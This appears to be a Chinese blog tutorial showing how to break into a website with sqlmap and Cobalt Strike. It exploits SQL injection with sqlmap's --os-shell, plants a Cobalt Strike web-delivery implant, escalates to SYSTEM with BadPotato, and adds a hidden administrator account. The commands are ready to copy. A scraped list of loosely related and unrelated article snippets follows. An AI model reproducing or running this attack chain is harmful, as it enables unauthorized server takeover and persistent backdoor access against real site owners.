利用cobaltstrike加sqlmap拿下一个网站并提权
Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。
Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。

拿到一个网站时,单引号测试是否存在注入点:


数据库返回错误;说明大概率存在注入点。

sqlmap跑一遍,发现存在注入点:
sqlmap.py -u http://10.6.18.106/Info/InfoDetail.aspx?id=421 --batch

利用:sqlmap.py -u http://10.6.18.106/Info/InfoDetail.aspx?id=421 --os-shell --batch,来执行操作系统命令:

之后我们用到cobaltstrike:
开启cobaltstrike:

新建一个scripted web delivery攻击,


复制里面这段代码到刚才配置好的sqlmap中,

此时,cobaltstrike上如果有了目标ip,说明攻击成功!

尝试创建用户:shell net user adas /add

失败!说明权限不够~ shell systeminfo 查看操作系统版本信息:


服务器为windows 2012,接下来的思路是:寻找上传点,配合badpotato.exe尝试进行提权:


上传成功!
尝试提权~
shell C:\nmgeip\BadPotatoNet2.exe “whoami”

可以看到此时的权限为系统权限,提权成功!!!
添加用户:shell C:\nmgeip\BadPotatoNet2.exe “net user lianxi /add”

添加到管理员组:shell C:\nmgeip\BadPotatoNet2.exe “net localgroup administrators lianxi /add”

完成!

利用cobaltstrike加sqlmap拿下一个网站并提权相关推荐

  1. windos php7 fast cgi,FAST-CGI解析漏洞拿下网站并提权windows系统服务器

    作为一个懒散的人,我比较喜欢关注网上发布的漏洞.利用最新的漏洞可以比较简单的得到webshell,然后利用webshell提权拿下服务器,这个是我最喜欢的.有一个很有意思的娱乐网站,我经常登陆浏览,以 ...

  2. 如何利用宝塔面板+nginx建立一个自己的网站(如博客图床等等)

    其实最近一直在搭建自己的博客和自己的图床,遇见了一些各种各样的问题,所以在这里总结一下如何利用宝塔面板来建立一个网站. 1.网站在服务器中的形式 其实网站虽然是网站我们能访问到,实际上我们访问到的都是 ...

  3. 网站为什么会被降权 网站降权恢复的解决方案

    最近降权的网站太多了,写这篇文章,送给一些新手朋友吧. 网站为什么会被降权?每一个网站降权的原因都是不同的,但是归根结底有几个共同点,跟大家分享一下: 第一:刷了快排的站点 我相信,现在的企业80%以 ...

  4. 利用CS4.0和FRP拿下“打牌”网站服务器

    利用CS4.0和FRP拿下"打牌"网站服务器 环境的部署 CS4.0服务器部署 踩坑点 frp部署 开始打牌 抓个包 还没有结束 声明:本文旨在技术学习研究,请勿用于违法用途,否则 ...

  5. “在解决方案中的一个或多个项目由于以下原因未能加载 项目文件或网站已移动或重新命名,或者不在您的计算机上” 的解决办法...

    用Visual studio.NET 2003/2005/2008在打开从网上下载的解决方案或从其他地方考来的解决方案时,往往会碰到一个这样的错误,提示说: "在解决方案中的一个或多个项目由 ...

  6. [html] 请实现一个网站加载进度条

    [html] 请实现一个网站加载进度条 import { memo } from 'react'; import { useLifecycles } from 'react-use'; import ...

  7. windows和Linux利用Python快速搭建一个网站

    windows和Linux利用Python快速搭建一个网站 一.windows 步骤1:安装Python3(自行百度) 步骤2:在cmd窗口输入ipconfig查看本机ip地址,IPV4那一行.如:1 ...

  8. 利用wojilu框架仿一个网站的全过程(Step by Step利用wojilu框架开发网站系列二 附源码)...

    被仿的网站和仿照后的网站 被仿的网站-易读 仿照后的网站-我读 仿这个网站的目的:为了实践一下新学习的轻量级asp.net web开发框架[我记录] ,该网站比较简单,适合入门. 实现章节 章节部分, ...

  9. 给你一个网站你是如何来渗透测试的

    给你一个网站你是如何来渗透测试的? from:https://zhuanlan.zhihu.com/p/36534786 1)信息收集, 1,获取域名的whois信息,获取注册者邮箱姓名电话等. 2, ...

最新文章

  1. 《压缩感知理论及其研究进展》读书笔记
  2. Eclipse中导入第三方源码的问题和备用解决方案
  3. (iOS)Storyboard/xib小技巧
  4. jquery ajax node,jquery ajax post json and node express
  5. R开发(part6)--pryr包
  6. 英伟达收购交易取消后 ARM将裁员1000人
  7. 理解浏览器和nodeJs中的事件循环(Event Loop)
  8. continue 与break 的区别
  9. Python实现双色球随机选号
  10. 辰视冯良炳博士作为专家出席演讲的2021视觉系统设计会议圆满闭幕
  11. 一些有趣的数学知识-数学知识
  12. python打印自动换行如何解决,python不换行打印的方法
  13. 人工智能英文缩写怎么读,人工智能英文缩写大全
  14. Wordvice推出人工智能工具 免费论文润色功能受欢迎
  15. 程序化广告(三)- 程序化广告生态链介绍如DSP/ADX/DMP等
  16. string类型--字符串常用取值操作
  17. pytorch损失函数binary_cross_entropy和binary_cross_entropy_with_logits的区别
  18. 股票——指数移动平均线
  19. yapi与rap2比较
  20. 轨道不平顺-振动响应-信号分析方法(持续整理中...)

热门文章

  1. 还敢搞黄色?4 个色情网站被一锅端,9 名福利姬被刑拘!
  2. 如何给自己的U盘自定义图标
  3. 南京大学计算机学院英才计划,南京大学以“英才计划”为切入点 向前衔接高中...
  4. 复旦毕业生兼职送外卖,去你的“精神内耗”
  5. 《苏菲的世界》读书笔记之一:自然派哲学家
  6. 如何在支付宝开直播,这篇入驻教程不要错过,看完你就会了
  7. 时间在线验证 java代码_timetest.java 源代码在线查看 - Java获取各种常用时间方法 资源下载 虫虫电子下载站...
  8. 驱动专题:第五章MTD及Flash驱动 1.mtd框架分析
  9. Python-opencv 批量处理图片
  10. 蓝屏终止代码:WHEA INTERNAL ERROR